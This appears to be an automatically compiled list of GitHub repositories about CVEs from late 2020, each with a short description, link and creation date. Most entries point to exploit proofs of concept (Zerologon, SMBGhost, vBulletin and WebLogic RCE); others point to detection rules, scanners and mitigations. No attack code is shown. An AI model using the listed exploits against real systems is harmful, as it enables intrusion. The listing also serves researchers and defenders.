**Detects CVE-2020-16898: "Bad Neighbor"** : [esnet-security/cve-2020-16898](https://github.com/esnet-security/cve-2020-16898) create time: 2020-10-14T16:38:06Z

**HoneyPoC 2.0: Proof-of-Concept (PoC) script to exploit IPv6 (CVE-2020-16898).** : [ZephrFish/CVE-2020-16898](https://github.com/ZephrFish/CVE-2020-16898) create time: 2020-10-14T14:42:52Z

**Minor powershell script that checks for vulnerable interfaces.** : [Maliek/CVE-2020-16898_Check](https://github.com/Maliek/CVE-2020-16898_Check) create time: 2020-10-14T13:30:38Z

**CVE-2019-10172 PoC and Possible mitigations** : [rusakovichma/CVE-2019-10172](https://github.com/rusakovichma/CVE-2019-10172) create time: 2020-10-14T12:00:20Z

**no description** : [toy0756428/CVE_2020_3452_Detect](https://github.com/toy0756428/CVE_2020_3452_Detect) create time: 2020-10-14T07:52:00Z

**A network detection package for CVE-2020-16898 (Windows TCP/IP Remote Code Execution Vulnerability)** : [corelight/CVE-2020-16898](https://github.com/corelight/CVE-2020-16898) create time: 2020-10-14T03:25:00Z

**PoC code for CVE-2020-16939 Windows Group Policy DACL Overwrite Privilege Escalation** : [rogue-kdc/CVE-2020-16939](https://github.com/rogue-kdc/CVE-2020-16939) create time: 2020-10-14T00:03:49Z

**no description** : [pswalia2u/CVE-2018-6574](https://github.com/pswalia2u/CVE-2018-6574) create time: 2020-10-13T07:32:04Z

**CVE-2020-16899 - Microsoft Windows TCP/IP Vulnerability Detection Logic and Rule** : [advanced-threat-research/CVE-2020-16899](https://github.com/advanced-threat-research/CVE-2020-16899) create time: 2020-10-12T20:59:03Z

**BlueBorne Exploits & Framework This repository contains a PoC code of various exploits for the BlueBorne vulnerabilities. Under 'android' exploits for the Android RCE vulnerability (CVE-2017-0781), and the SDP Information leak vulnerability (CVE-2017-0785) can be found. Under 'linux-bluez' exploits for the Linux-RCE vulnerability (CVE-2017-1000251) can be found (for Amazon Echo, and Samsung Gear S3). Under 'l2cap_infra' a general testing framework to send and receive raw l2cap messages (using scapy) can be found. Under 'nRF24_BDADDR_Sniffer' a tool to capture bluetooth mac addresses (BDADDR) over the air, using a nRF24L01 chip For more details on BlueBorne, you may read the full technical white paper available here: https://www.armis.com/blueborne/ In addition a several detailed blog posts on the exploitation of these vulnerability can be found here: https://www.armis.com/blog/ =============== Dependencies:** : [CrackSoft900/Blue-Borne](https://github.com/CrackSoft900/Blue-Borne) create time: 2020-10-12T07:21:08Z

**Cve 2018-0208** : [dima5455/Cve-2018-0208](https://github.com/dima5455/Cve-2018-0208) create time: 2020-10-11T10:38:41Z

**A docker-contained koseven hello world to play with SQL injection CVE-2019-8979 affecting versions < 3.3.10** : [seb-elttam/ko7demo](https://github.com/seb-elttam/ko7demo) create time: 2020-10-11T06:23:24Z

**no description** : [n3m1dotsys/CVE-2018-16763-Exploit-Python3](https://github.com/n3m1dotsys/CVE-2018-16763-Exploit-Python3) create time: 2020-10-10T20:23:59Z

**https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8** : [mansoorr123/wp-file-manager-CVE-2020-25213](https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213) create time: 2020-10-10T17:50:01Z

**no description** : [Ken-Abruzzi/cve_2020_0688](https://github.com/Ken-Abruzzi/cve_2020_0688) create time: 2020-10-10T09:46:24Z

**no description** : [Ken-Abruzzi/cve_2020_0796](https://github.com/Ken-Abruzzi/cve_2020_0796) create time: 2020-10-10T09:20:40Z

**no description** : [shanfenglan/cve-2020-1472](https://github.com/shanfenglan/cve-2020-1472) create time: 2020-10-10T09:00:41Z

**CVE-2020-15227 exploit** : [hu4wufu/CVE-2020-15227](https://github.com/hu4wufu/CVE-2020-15227) create time: 2020-10-10T02:38:15Z

**CVE-2020-15227 exploit** : [Langriklol/CVE-2020-15227](https://github.com/Langriklol/CVE-2020-15227) create time: 2020-10-09T13:13:14Z

**Proof of Concept (PoC) for CVE-2020-5248.** : [indevi0us/CVE-2020-5248](https://github.com/indevi0us/CVE-2020-5248) create time: 2020-10-09T12:31:19Z

**no description** : [intellee/CVE-2019-1477](https://github.com/intellee/CVE-2019-1477) create time: 2020-10-09T07:33:44Z

**Typesetter CMS文件上传漏洞环境** : [7Mitu/CVE-2020-25790](https://github.com/7Mitu/CVE-2020-25790) create time: 2020-10-09T06:50:02Z

**no description** : [glasses618/CVE-2020-15169](https://github.com/glasses618/CVE-2020-15169) create time: 2020-10-08T15:42:37Z

**Jiangmin** : [intrigus-lgtm/CVE-2020-14955](https://github.com/intrigus-lgtm/CVE-2020-14955) create time: 2020-10-08T14:41:23Z

**CVE-2020-16898 (Bad Neighbor) Microsoft Windows TCP/IP Vulnerability Detection Logic and Rule** : [advanced-threat-research/CVE-2020-16898](https://github.com/advanced-threat-research/CVE-2020-16898) create time: 2020-10-07T19:56:09Z

**This would basically send smb1 (not smb2) packets to determine if a machine is vulnerable to CVE-2017-0143 (Etern-Blue for windows). (Work in progress)** : [6A0BCD80/Etern-blue-Windows-7-Checker](https://github.com/6A0BCD80/Etern-blue-Windows-7-Checker) create time: 2020-10-07T06:19:45Z

**CVE20206558** : [MIAIONE/CVE20206558](https://github.com/MIAIONE/CVE20206558) create time: 2020-10-06T04:49:01Z

**CVE-2020-26061 - ClickStudios Passwordstate Password Reset Portal** : [missing0x00/CVE-2020-26061](https://github.com/missing0x00/CVE-2020-26061) create time: 2020-10-05T14:52:34Z

**Bludit 3.9.2 - Remote command execution - CVE-2019-16113** : [noroh4xy/CVE-2019-16113](https://github.com/noroh4xy/CVE-2019-16113) create time: 2020-10-03T21:38:39Z

**no description** : [masoud-zivari/CVE-2020-14064](https://github.com/masoud-zivari/CVE-2020-14064) create time: 2020-10-03T09:30:34Z

**no description** : [masoud-zivari/CVE-2020-14066](https://github.com/masoud-zivari/CVE-2020-14066) create time: 2020-10-03T09:17:35Z

**no description** : [masoud-zivari/CVE-2020-14065](https://github.com/masoud-zivari/CVE-2020-14065) create time: 2020-10-03T09:13:19Z

**SAP IGS XXE attack CVE-2018-2392 and CVE-2018-2393** : [Vladimir-Ivanov-Git/sap_igs_xxe](https://github.com/Vladimir-Ivanov-Git/sap_igs_xxe) create time: 2020-10-02T17:57:22Z

**coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/** : [zaphoxx/zaphoxx-coldfusion](https://github.com/zaphoxx/zaphoxx-coldfusion) create time: 2020-10-02T15:17:21Z

**no description** : [lukaszstu/SmartAsset-CORS-CVE-2020-26527](https://github.com/lukaszstu/SmartAsset-CORS-CVE-2020-26527) create time: 2020-10-02T07:20:38Z

**It is possible to enumerate valid usernames on the login page.** : [lukaszstu/SmartAsset-UE-CVE-2020-26526](https://github.com/lukaszstu/SmartAsset-UE-CVE-2020-26526) create time: 2020-10-02T07:15:52Z

**Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter.** : [lukaszstu/SmartAsset-SQLinj-CVE-2020-26525](https://github.com/lukaszstu/SmartAsset-SQLinj-CVE-2020-26525) create time: 2020-10-02T07:12:18Z

**no description** : [5l1v3r1/CVE-2020-10205](https://github.com/5l1v3r1/CVE-2020-10205) create time: 2020-10-01T08:49:47Z

**Protect your domain controllers against Zerologon (CVE-2020-1472).** : [rhymeswithmogul/Set-ZerologonMitigation](https://github.com/rhymeswithmogul/Set-ZerologonMitigation) create time: 2020-09-30T16:10:26Z

**no description** : [ReverseBrain/CVE-2018-12421](https://github.com/ReverseBrain/CVE-2018-12421) create time: 2020-09-30T16:02:05Z

**no description** : [miguelhamal/CVE-2019-19393](https://github.com/miguelhamal/CVE-2019-19393) create time: 2020-09-30T15:21:48Z

**CVE-2019-18935** : [random-robbie/CVE-2019-18935](https://github.com/random-robbie/CVE-2019-18935) create time: 2020-09-30T10:00:16Z

**no description** : [Ken-Abruzzi/CVE-2020-0674](https://github.com/Ken-Abruzzi/CVE-2020-0674) create time: 2020-09-30T08:08:42Z

**no description** : [Ken-Abruzzi/cve-2020-1472](https://github.com/Ken-Abruzzi/cve-2020-1472) create time: 2020-09-30T07:45:50Z

**Zerologon AutoExploit Tool | CVE-2020-1472** : [Privia-Security/ADZero](https://github.com/Privia-Security/ADZero) create time: 2020-09-29T20:43:06Z

**POC for checking multiple hosts for Zerologon vulnerability** : [WiIs0n/Zerologon_CVE-2020-1472](https://github.com/WiIs0n/Zerologon_CVE-2020-1472) create time: 2020-09-29T18:45:44Z

**CVE-2019-17240 - Bludit 3.9.2 Authentication Bypass** : [noroh4xy/CVE-2019-17240](https://github.com/noroh4xy/CVE-2019-17240) create time: 2020-09-29T13:51:39Z

**Snort rule for CVE 2020-1472 Detection** : [Sajuwithgithub/CVE2020-1472](https://github.com/Sajuwithgithub/CVE2020-1472) create time: 2020-09-29T02:18:37Z

**CVE-2018-5354** : [missing0x00/CVE-2018-5354](https://github.com/missing0x00/CVE-2018-5354) create time: 2020-09-28T20:17:50Z

**CVE-2018-5353** : [missing0x00/CVE-2018-5353](https://github.com/missing0x00/CVE-2018-5353) create time: 2020-09-28T18:38:26Z

**CVE-2020-1472** : [Whippet0/CVE-2020-1472](https://github.com/Whippet0/CVE-2020-1472) create time: 2020-09-28T09:54:31Z

**no description** : [Fa1c0n35/CVE-2020-1472-02-](https://github.com/Fa1c0n35/CVE-2020-1472-02-) create time: 2020-09-28T06:53:41Z

**To crash Windows-10 easily** : [codewithpradhan/SMBGhost-CVE-2020-0796-](https://github.com/codewithpradhan/SMBGhost-CVE-2020-0796-) create time: 2020-09-28T05:23:20Z

**Just basic scanner abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of the CISCO ASA applicances.** : [3ndG4me/CVE-2020-3452-Exploit](https://github.com/3ndG4me/CVE-2020-3452-Exploit) create time: 2020-09-28T05:00:37Z

**no description** : [lsnakazone/cve-2018-6574](https://github.com/lsnakazone/cve-2018-6574) create time: 2020-09-27T20:08:49Z

**no description** : [striveben/CVE-2020-1472](https://github.com/striveben/CVE-2020-1472) create time: 2020-09-26T08:31:47Z

**no description** : [devil2531/cve20177529](https://github.com/devil2531/cve20177529) create time: 2020-09-26T07:47:29Z

**PoCs and technical analysis of three vulnerabilities found on Cisco AnyConnect for Windows: CVE-2020-3433, CVE-2020-3434 and CVE-2020-3435** : [goichot/CVE-2020-3433](https://github.com/goichot/CVE-2020-3433) create time: 2020-09-25T20:53:48Z

**AppleJPEGDriverUserClient : mach port use-after-free/type-confusion via race condition** : [XorgX304/CVE-2020-9768](https://github.com/XorgX304/CVE-2020-9768) create time: 2020-09-25T13:12:04Z

**Patch and enforcement key assessment for CVE 2020-1472** : [technion/ZeroLogonAssess](https://github.com/technion/ZeroLogonAssess) create time: 2020-09-25T03:06:50Z

**no description** : [defjamvan/cve20201472](https://github.com/defjamvan/cve20201472) create time: 2020-09-25T01:33:25Z

**CVE 2020-1472 Script de validación** : [grupooruss/CVE-2020-1472](https://github.com/grupooruss/CVE-2020-1472) create time: 2020-09-24T20:05:21Z

**This repository holds the advisory, exploits and vulnerable software of the CVE-2020-14293** : [patrickhener/CVE-2020-14293](https://github.com/patrickhener/CVE-2020-14293) create time: 2020-09-24T09:17:38Z

**This repository holds the advisory of the CVE-2020-14294** : [patrickhener/CVE-2020-14294](https://github.com/patrickhener/CVE-2020-14294) create time: 2020-09-24T08:49:05Z

**This repository holds the advisory, exploits and vulnerable software of the CVE-2020-15492** : [patrickhener/CVE-2020-15492](https://github.com/patrickhener/CVE-2020-15492) create time: 2020-09-24T08:36:40Z

**CVE-2014-0472 Django unexpected code execution using reverse()** : [christasa/CVE-2014-0472](https://github.com/christasa/CVE-2014-0472) create time: 2020-09-23T16:21:57Z

**no description** : [thomasfady/CVE-2020-25867](https://github.com/thomasfady/CVE-2020-25867) create time: 2020-09-23T14:02:40Z

**Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.** : [Ko-kn3t/CVE-2020-25273](https://github.com/Ko-kn3t/CVE-2020-25273) create time: 2020-09-23T04:29:29Z

**Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php** : [Ko-kn3t/CVE-2020-25272](https://github.com/Ko-kn3t/CVE-2020-25272) create time: 2020-09-23T04:20:16Z

**no description** : [Ko-kn3t/CVE-2020-25271](https://github.com/Ko-kn3t/CVE-2020-25271) create time: 2020-09-23T03:24:20Z

**PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City** : [Ko-kn3t/CVE-2020-25270](https://github.com/Ko-kn3t/CVE-2020-25270) create time: 2020-09-23T03:16:08Z

**cve-2020-13933 apache shiro权限绕过漏洞** : [0xkami/cve-2020-13933](https://github.com/0xkami/cve-2020-13933) create time: 2020-09-23T01:55:46Z

**Unrestricted File Upload in Simple Library Management System 1.0** : [Ko-kn3t/CVE-2020-25515](https://github.com/Ko-kn3t/CVE-2020-25515) create time: 2020-09-22T17:23:21Z

**Login Bypass in Simple Library Management System 1.0** : [Ko-kn3t/CVE-2020-25514](https://github.com/Ko-kn3t/CVE-2020-25514) create time: 2020-09-22T16:52:15Z

**SQL injection Vulnerability in Zoo Management System** : [Ko-kn3t/CVE-2020-25487](https://github.com/Ko-kn3t/CVE-2020-25487) create time: 2020-09-22T16:37:46Z

**Login Bypass in Zoo Management System V1.0** : [Ko-kn3t/CVE-2020-25488](https://github.com/Ko-kn3t/CVE-2020-25488) create time: 2020-09-22T16:28:34Z

**All five experiments of computer vision courses opened at Xidian University. CV XDU** : [Jiehuishun/CVExp-XDU-2020-CS5201](https://github.com/Jiehuishun/CVExp-XDU-2020-CS5201) create time: 2020-09-22T08:54:12Z

**no description** : [t31m0/CVE-2020-1472](https://github.com/t31m0/CVE-2020-1472) create time: 2020-09-21T07:24:03Z

**几条关于CVE-2020-15148(yii2反序列化)的绕过** : [Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses) create time: 2020-09-21T03:55:55Z

**An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'.** : [Ken-Abruzzi/CVE-2020-1048](https://github.com/Ken-Abruzzi/CVE-2020-1048) create time: 2020-09-21T01:59:38Z

**no description** : [mugisyahid/ki-vuln-cve-2020-5410](https://github.com/mugisyahid/ki-vuln-cve-2020-5410) create time: 2020-09-20T19:13:17Z

**no description** : [johnpathe/zerologon-cve-2020-1472-notes](https://github.com/johnpathe/zerologon-cve-2020-1472-notes) create time: 2020-09-20T13:44:16Z

**no description** : [dima5455/CVE2020](https://github.com/dima5455/CVE2020) create time: 2020-09-20T10:36:19Z

**no description** : [hectorgie/CVE-2020-1472](https://github.com/hectorgie/CVE-2020-1472) create time: 2020-09-19T23:15:41Z

**A simple implementation/code smash of a bunch of other repos** : [midpipps/CVE-2020-1472-Easy](https://github.com/midpipps/CVE-2020-1472-Easy) create time: 2020-09-19T20:44:40Z

**CVE-2020-25749** : [jet-pentest/CVE-2020-25749](https://github.com/jet-pentest/CVE-2020-25749) create time: 2020-09-18T15:05:16Z

**CVE-2020-25748** : [jet-pentest/CVE-2020-25748](https://github.com/jet-pentest/CVE-2020-25748) create time: 2020-09-18T15:03:38Z

**CVE-2020-25747** : [jet-pentest/CVE-2020-25747](https://github.com/jet-pentest/CVE-2020-25747) create time: 2020-09-18T14:23:35Z

**no description** : [Uvemode/CVE-2020-2555](https://github.com/Uvemode/CVE-2020-2555) create time: 2020-09-18T12:37:20Z

**2020l4web-typography-css-library-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-typography-css-library-DanCvejn](https://github.com/pslib-cz/2020l4web-typography-css-library-DanCvejn) create time: 2020-09-18T08:04:11Z

**Scripts to verify and execute CVE-2019-14287 as part of Research** : [M108Falcon/Sudo-CVE-2019-14287](https://github.com/M108Falcon/Sudo-CVE-2019-14287) create time: 2020-09-18T06:10:35Z

**cve-2010-2075** : [XorgX304/UnrealIRCd-3.2.8.1-RCE](https://github.com/XorgX304/UnrealIRCd-3.2.8.1-RCE) create time: 2020-09-18T01:07:51Z

**Exploit for uTorrent vulnerability CVE-2020-8437 by whtaguy** : [guywhataguy/uTorrent-CVE-2020-8437](https://github.com/guywhataguy/uTorrent-CVE-2020-8437) create time: 2020-09-18T01:03:18Z

**CVE-2020-1472复现时使用的py文件整理打包** : [sv3nbeast/CVE-2020-1472](https://github.com/sv3nbeast/CVE-2020-1472) create time: 2020-09-18T00:02:26Z

**no description** : [mos165/CVE-20200-1472](https://github.com/mos165/CVE-20200-1472) create time: 2020-09-17T23:59:23Z

**no description** : [cgwalters/cve-2020-14386](https://github.com/cgwalters/cve-2020-14386) create time: 2020-09-17T21:25:18Z

**no description** : [refi64/CVE-2020-25265-25266](https://github.com/refi64/CVE-2020-25265-25266) create time: 2020-09-17T20:25:02Z

**PoC exploits for CVE-2020-17382** : [uf0o/CVE-2020-17382](https://github.com/uf0o/CVE-2020-17382) create time: 2020-09-17T18:26:32Z

**no description** : [pwn3z/CVE-2018-13379-FortinetVPN](https://github.com/pwn3z/CVE-2018-13379-FortinetVPN) create time: 2020-09-17T18:00:11Z

**no description** : [pwn3z/CVE-2019-11510-PulseVPN](https://github.com/pwn3z/CVE-2019-11510-PulseVPN) create time: 2020-09-17T17:53:56Z

**Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB** : [zeronetworks/zerologon](https://github.com/zeronetworks/zerologon) create time: 2020-09-17T16:53:17Z

**no description** : [rsmudge/CVE-2020-0796-BOF](https://github.com/rsmudge/CVE-2020-0796-BOF) create time: 2020-09-17T01:48:37Z

**CVE-2020-9992 - A design flaw in MobileDevice.framework/Xcode and iOS/iPadOS/tvOS Development Tools allows an attacker in the same network to gain remote code execution on a target device** : [c0ntextomy/c0ntextomy](https://github.com/c0ntextomy/c0ntextomy) create time: 2020-09-16T23:35:22Z

**no description** : [ret2hell/CVE-2020-8835](https://github.com/ret2hell/CVE-2020-8835) create time: 2020-09-16T19:38:43Z

**no description** : [victim10wq3/CVE-2020-1472](https://github.com/victim10wq3/CVE-2020-1472) create time: 2020-09-16T14:25:54Z

**https://github.com/dirkjanm/CVE-2020-1472** : [npocmak/CVE-2020-1472](https://github.com/npocmak/CVE-2020-1472) create time: 2020-09-16T09:54:09Z

**[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)** : [murataydemir/CVE-2020-1472](https://github.com/murataydemir/CVE-2020-1472) create time: 2020-09-16T09:22:30Z

**cve-2020-1472_Tool collection** : [0xcccc666/cve-2020-1472_Tool-collection](https://github.com/0xcccc666/cve-2020-1472_Tool-collection) create time: 2020-09-16T08:32:52Z

**CVE-2020-1472 - Zero Logon vulnerability Python implementation** : [CanciuCostin/CVE-2020-1472](https://github.com/CanciuCostin/CVE-2020-1472) create time: 2020-09-16T07:25:22Z

**no description** : [Fa1c0n35/SecuraBV-CVE-2020-1472](https://github.com/Fa1c0n35/SecuraBV-CVE-2020-1472) create time: 2020-09-16T03:57:04Z

**no description** : [Fa1c0n35/CVE-2020-1472](https://github.com/Fa1c0n35/CVE-2020-1472) create time: 2020-09-16T03:54:27Z

**cve-2020-1472 复现利用及其exp** : [mstxq17/cve-2020-1472](https://github.com/mstxq17/cve-2020-1472) create time: 2020-09-16T03:40:47Z

**Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472** : [scv-m/zabbix-template-CVE-2020-1472](https://github.com/scv-m/zabbix-template-CVE-2020-1472) create time: 2020-09-16T02:37:52Z

**Scans for nginx integer overflow vulnerability (CVE-2017-7529)** : [daehee/nginx-overflow](https://github.com/daehee/nginx-overflow) create time: 2020-09-15T21:19:17Z

**no description** : [mprunet/owasp-formation-cve-2018-1270](https://github.com/mprunet/owasp-formation-cve-2018-1270) create time: 2020-09-15T20:19:09Z

**CVE-2020-1472** : [422926799/CVE-2020-1472](https://github.com/422926799/CVE-2020-1472) create time: 2020-09-15T16:36:40Z

**Ladon Moudle CVE-2020-1472 Exploit 域控提权神器** : [k8gege/CVE-2020-1472-EXP](https://github.com/k8gege/CVE-2020-1472-EXP) create time: 2020-09-15T16:10:21Z

**PoC for Zerologon (CVE-2020-1472) - Exploit** : [harshil-shah004/zerologon-CVE-2020-1472](https://github.com/harshil-shah004/zerologon-CVE-2020-1472) create time: 2020-09-15T14:29:24Z

**no description** : [s0wr0b1ndef/CVE-2020-1472](https://github.com/s0wr0b1ndef/CVE-2020-1472) create time: 2020-09-15T13:50:01Z

**CVE-2020-1472复现流程** : [NAXG/CVE-2020-1472](https://github.com/NAXG/CVE-2020-1472) create time: 2020-09-15T12:11:49Z

**Proof of Concept of CVE-2020-15873 - Blind SQL Injection in Librenms < v1.65.1** : [limerencee/cs4239-cve-2020-15873](https://github.com/limerencee/cs4239-cve-2020-15873) create time: 2020-09-15T10:26:26Z

**CVE-2020-1472漏洞复现过程** : [0xkami/CVE-2020-1472](https://github.com/0xkami/CVE-2020-1472) create time: 2020-09-15T10:25:47Z

**Anaysis cve-2017-11176 / mq_notify issue** : [applemasterz17/CVE-2017-11176](https://github.com/applemasterz17/CVE-2017-11176) create time: 2020-09-15T05:01:34Z

**Abuse CVE-2020-1472 (Zerologon) to take over a domain and then repair the local stored machine account password.** : [bb00/zer0dump](https://github.com/bb00/zer0dump) create time: 2020-09-14T19:27:14Z

**Exploit for zerologon cve-2020-1472** : [risksense/zerologon](https://github.com/risksense/zerologon) create time: 2020-09-14T19:19:07Z

**Exploit Code for CVE-2020-1472 aka Zerologon** : [VoidSec/CVE-2020-1472](https://github.com/VoidSec/CVE-2020-1472) create time: 2020-09-14T16:57:49Z

**PoC for Zerologon - all research credits go to Tom Tervoort of Secura** : [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472) create time: 2020-09-14T16:56:51Z

**no description** : [cube0x0/CVE-2020-1472](https://github.com/cube0x0/CVE-2020-1472) create time: 2020-09-14T16:52:37Z

**for 供養** : [Goyotan/CVE-2020-6468-PoC](https://github.com/Goyotan/CVE-2020-6468-PoC) create time: 2020-09-14T12:36:56Z

**(CVE-2017-9841) PHPUnit_eval-stdin_php Remote Code Execution** : [ludy-dev/PHPUnit_eval-stdin_RCE](https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE) create time: 2020-09-14T12:33:44Z

**no description** : [kawkab101/cve-2018-6574](https://github.com/kawkab101/cve-2018-6574) create time: 2020-09-13T04:34:58Z

**CVE-2019-15107 exploit** : [n0obit4/Webmin_1.890-POC](https://github.com/n0obit4/Webmin_1.890-POC) create time: 2020-09-13T03:11:29Z

**My first zero day.** : [Crystalware/CVE-2019-13600](https://github.com/Crystalware/CVE-2019-13600) create time: 2020-09-12T21:25:14Z

**Un semplice exploit che sfrutta CVE-2015-7297, CVE-2015-7857 and CVE-2015-7858 per elencare gli utenti con la psw del db** : [kally-life/exploit-joomla](https://github.com/kally-life/exploit-joomla) create time: 2020-09-12T19:44:41Z

**no description** : [Hacker-Yadav/CVE-2019-11932](https://github.com/Hacker-Yadav/CVE-2019-11932) create time: 2020-09-12T07:18:57Z

**CVE-2020-25518, CVE-2020-25519** : [g-rubert/wordpress_DoS](https://github.com/g-rubert/wordpress_DoS) create time: 2020-09-11T14:14:36Z

**Zero-Day Vulnerability in File Manager Plugin 6.7 ( CVE 2020-25213 )** : [aron-tn/0day-elFinder-2020](https://github.com/aron-tn/0day-elFinder-2020) create time: 2020-09-11T08:56:56Z

**Automatically exploit systems with vulnerable davfs2 (CVE-2013-4362)** : [notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation](https://github.com/notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation) create time: 2020-09-10T16:06:23Z

**no description** : [Ph4nt0m-b/CVE-2020-3187](https://github.com/Ph4nt0m-b/CVE-2020-3187) create time: 2020-09-10T06:33:01Z

**(CVE-2020-5902) BIG IP F5 TMUI RCE Vulnerability RCE PoC/ Test Script** : [ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability](https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability) create time: 2020-09-09T20:15:03Z

**CVE-2020-8290 – Elevation of Privilege in Backblaze** : [geffner/CVE-2020-8290](https://github.com/geffner/CVE-2020-8290) create time: 2020-09-09T14:42:36Z

**CVE-2020-8289 – Remote Code Execution as SYSTEM/root via Backblaze** : [geffner/CVE-2020-8289](https://github.com/geffner/CVE-2020-8289) create time: 2020-09-09T14:39:16Z

**CVE-2020-13933 靶场: shiro 认证绕过漏洞** : [lyy289065406/CVE-2020-13933](https://github.com/lyy289065406/CVE-2020-13933) create time: 2020-09-09T10:20:25Z

**Test tool for CVE-2020-1472** : [SecuraBV/CVE-2020-1472](https://github.com/SecuraBV/CVE-2020-1472) create time: 2020-09-08T08:58:37Z

**no description** : [tea9/CVE-2020-0114-systemui](https://github.com/tea9/CVE-2020-0114-systemui) create time: 2020-09-08T06:06:36Z

**CVE-2020-0096-StrandHogg2 复现** : [tea9/CVE-2020-0096-StrandHogg2](https://github.com/tea9/CVE-2020-0096-StrandHogg2) create time: 2020-09-07T10:25:25Z

**CuteNews 2.1.2 - CVE-2019-11447 Proof-Of-Concept** : [CRFSlick/CVE-2019-11447-POC](https://github.com/CRFSlick/CVE-2019-11447-POC) create time: 2020-09-07T06:21:10Z

**Rust implementation of the Fusée Gelée exploit (CVE-2018-6242) for Tegra processors.** : [austinhartzheim/fusee-gelee](https://github.com/austinhartzheim/fusee-gelee) create time: 2020-09-07T03:28:15Z

**pritunl-CVE-2020-25200** : [lukaszstu/pritunl-CVE-2020-25200](https://github.com/lukaszstu/pritunl-CVE-2020-25200) create time: 2020-09-06T22:11:24Z

**no description** : [apidotmy/CVE-2019](https://github.com/apidotmy/CVE-2019) create time: 2020-09-06T22:09:14Z

**Vbulletin RCE Exploits** : [apidotmy/CVE-2019-16759](https://github.com/apidotmy/CVE-2019-16759) create time: 2020-09-06T21:55:58Z

**no description** : [anjai94/CVE-2020-9484-exploit](https://github.com/anjai94/CVE-2020-9484-exploit) create time: 2020-09-05T13:56:51Z

**Read arbitrary files for servers running Webmin before 1.290 and Usermin before 1.220.** : [notclement/cve-2006-3392](https://github.com/notclement/cve-2006-3392) create time: 2020-09-05T13:17:44Z

**CVE-2020-0014-Toast-复现** : [tea9/CVE-2020-0014-Toast](https://github.com/tea9/CVE-2020-0014-Toast) create time: 2020-09-04T09:02:29Z

**2020l4web-first-repository-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-first-repository-DanCvejn](https://github.com/pslib-cz/2020l4web-first-repository-DanCvejn) create time: 2020-09-04T08:25:53Z

**This is an updated version of the CVE-2018-16763 for fuelCMS 1.4.1** : [ecebotarosh/CVE-2018-16763-exploit](https://github.com/ecebotarosh/CVE-2018-16763-exploit) create time: 2020-09-03T15:06:22Z

**CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code** : [gerhart01/hyperv_local_dos_poc](https://github.com/gerhart01/hyperv_local_dos_poc) create time: 2020-09-03T14:45:51Z

**(CVE-2020-17496) vBulletin 5.x Widget_tabbedcontainer_tab_panel RCE Vuln Test script** : [ludy-dev/vBulletin_5.x-tab_panel-RCE](https://github.com/ludy-dev/vBulletin_5.x-tab_panel-RCE) create time: 2020-09-03T14:41:29Z

**cve-2020-24616 poc** : [0xkami/cve-2020-24616-poc](https://github.com/0xkami/cve-2020-24616-poc) create time: 2020-09-03T10:18:39Z

**CVE-2017-13156-Janus复现** : [tea9/CVE-2017-13156-Janus](https://github.com/tea9/CVE-2017-13156-Janus) create time: 2020-09-03T09:28:31Z

**no description** : [Wh1t3Fox/cve-2018-15473](https://github.com/Wh1t3Fox/cve-2018-15473) create time: 2020-09-02T23:07:22Z

**Exploit for CVE-2020-13162** : [redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-](https://github.com/redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-) create time: 2020-09-02T17:58:32Z

**Python script to exploit CVE-2020-25068.** : [bryanroma/CVE-2020-25068](https://github.com/bryanroma/CVE-2020-25068) create time: 2020-09-02T14:53:57Z

**SUPERAntiSyware Professional X Trial <= 10.0.1206 Local Privilege Escalation** : [b1nary0x1/CVE-2020-24955](https://github.com/b1nary0x1/CVE-2020-24955) create time: 2020-09-02T02:48:36Z

**(CVE-2019-6340, CVE-2018-7600) drupal8-REST-RCE** : [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE) create time: 2020-08-31T22:55:18Z

**no description** : [underprotection/CVE-2020-24030](https://github.com/underprotection/CVE-2020-24030) create time: 2020-08-31T18:38:58Z

**no description** : [underprotection/CVE-2020-24029](https://github.com/underprotection/CVE-2020-24029) create time: 2020-08-31T18:26:05Z

**no description** : [underprotection/CVE-2020-24028](https://github.com/underprotection/CVE-2020-24028) create time: 2020-08-31T18:00:21Z

**(CVE-2020-3452) Cisco Adaptive Security Appliance Software - Local File Inclusion Vuln Test sciript** : [ludy-dev/Cisco-ASA-LFI](https://github.com/ludy-dev/Cisco-ASA-LFI) create time: 2020-08-31T14:11:19Z

**(CVE-2019-2725) Oracle WLS(Weblogic) RCE test sciript** : [ludy-dev/Oracle-WLS-Weblogic-RCE](https://github.com/ludy-dev/Oracle-WLS-Weblogic-RCE) create time: 2020-08-31T14:09:09Z

**(CVE-2017-5638) XworkStruts RCE Vuln test script** : [ludy-dev/XworkStruts-RCE](https://github.com/ludy-dev/XworkStruts-RCE) create time: 2020-08-31T13:53:37Z

